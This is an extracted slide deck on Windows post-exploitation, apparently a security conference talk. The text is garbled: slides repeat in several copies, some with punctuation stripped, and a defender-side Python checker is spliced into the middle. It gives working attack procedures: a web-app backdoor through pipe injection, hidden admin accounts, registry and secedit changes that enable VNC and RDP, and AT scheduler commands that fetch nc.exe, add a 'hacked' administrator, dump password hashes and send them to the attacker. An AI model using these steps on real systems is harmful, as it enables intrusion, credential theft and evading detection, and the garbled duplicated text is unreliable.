bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (metasploit)
    • Enumerate / hijack tokens
  – FU / FUTO
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU / SUDO / KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling in-secure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is Basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires. l4m3
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ /user:username password
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the vnc files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
  [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
  "SocketConnect"=dword:00000001
  "AutoPortSelect"=dword:00000001
  "InputsEnabled"=dword:00000001
  "LocalInputsDisabled"=dword:00000000
  "IdleTimeout"=dword:00000000
  "QuerySetting"=dword:00000002
  "QueryTimeout"=dword:0000000a
  "PollUnderCursor"=dword:00000000
  "PollForeground"=dword:00000001
  "PollFullScreen"=dword:00000000
  "OnlyPollConsole"=dword:00000001
  "OnlyPollOnEvent"=dword:00000000
  "Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =
  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
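As an added defender-side example (not the authors' tooling), here is a Python checker for the three artifacts these slides drop on a host: the secedit template that rewrites logon rights, the .reg file that flips the Terminal Server key, and the WinVNC3 key that vnc.reg creates. The function names, the RDP account allow-list and the sample file contents are assumptions constructed for this example.

```python
"""Flag the policy and registry changes shown in slides 51, 53 and 54.
Added example for this page, not the authors' code; the allow-list,
function names and sample inputs below are constructed assumptions."""
import re
from typing import Dict, List

# Logon rights the template blanks out so nothing blocks the new logon.
DENY_RIGHTS = ("sedenyinteractivelogonright", "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")
GRANT_RIGHTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
VNC_KEY_FRAGMENT = r"\orl\winvnc3"   # key created by the vnc.reg on slide 51


def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a secedit .inf/.ini template into {section: {key: value}}.
    Names are lower-cased; secedit treats privilege names case-insensitively."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a 'Windows Registry Editor Version 5.00' export into
    {key_path: {value_name: raw_value}}; only quoted names are handled."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = re.match(r"^\[(.+)\]$", line)
        if key_match:
            current = key_match.group(1).lower()
            keys[current] = {}
            continue
        val_match = re.match(r'^"([^"]+)"=(.+)$', line)
        if val_match and current is not None:
            keys[current][val_match.group(1).lower()] = val_match.group(2).strip()
    return keys


def audit_policy_template(inf_text: str, allowed_rdp_accounts) -> List[str]:
    """Findings for a secedit template: cleared deny rights and logon rights
    granted to accounts outside the allow-list (the 'hacked_account' slot)."""
    findings: List[str] = []
    rights = parse_inf(inf_text).get("privilege rights", {})
    for right in DENY_RIGHTS:
        if right in rights and rights[right] == "":
            findings.append(f"{right} cleared: deny-logon protection removed")
    allowed = {a.strip().lower() for a in allowed_rdp_accounts}
    for right in GRANT_RIGHTS:
        for acct in (a.strip().lower() for a in rights.get(right, "").split(",")):
            if acct and acct not in allowed:
                findings.append(f"{right} granted to unexpected account {acct}")
    return findings


def audit_reg_export(reg_text: str) -> List[str]:
    """Findings for a .reg export: RDP switched on, or a WinVNC3 key present."""
    findings: List[str] = []
    keys = parse_reg(reg_text)
    ts = keys.get(TS_KEY, {})
    if ts.get("fdenytsconnections") == "dword:00000000":
        findings.append("fDenyTSConnections=0: Remote Desktop connections enabled")
    if ts.get("tsenabled") == "dword:00000001":
        findings.append("TSEnabled=1: Terminal Services switched on")
    for path in keys:
        if VNC_KEY_FRAGMENT in path:
            findings.append(f"WinVNC3 key present: VNC server configured ({path})")
    return findings


# Constructed sample inputs: the two files from slides 53 and 54, as written.
SLIDE_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""
SLIDE_REG = """Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""
# Constructed hardened baseline: deny rights keep a member, RDP group is expected.
BASELINE_INF = """[Privilege Rights]
seremoteinteractivelogonright = Remote Desktop Users
sedenyinteractivelogonright = Guest
sedenyremoteinteractivelogonright = Guest
sedenynetworklogonright = Guest
"""

if __name__ == "__main__":
    for finding in audit_policy_template(SLIDE_INF, ["Remote Desktop Users"]):
        print("POLICY:", finding)
    for finding in audit_reg_export(SLIDE_REG):
        print("REGISTRY:", finding)
```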
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
  net use \\target\ipc$ password /user:username
  at \\target 12:00 pm command
  Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols. TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish netbios session / credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 24
Persistence
• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally
    <input type="hidden" name="Lang">
• Edit web app and tie vuln perl code to form field input
    if (defined $hidden_field) { open($filename, ">$hidden_field"); }
• Craft a POST including the hidden field
Slide 25
Persistence
• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
Slide 26
Persistence
• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot 13, caesar)
  – Even more complex obfuscation
Slide 28
Persistence
• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
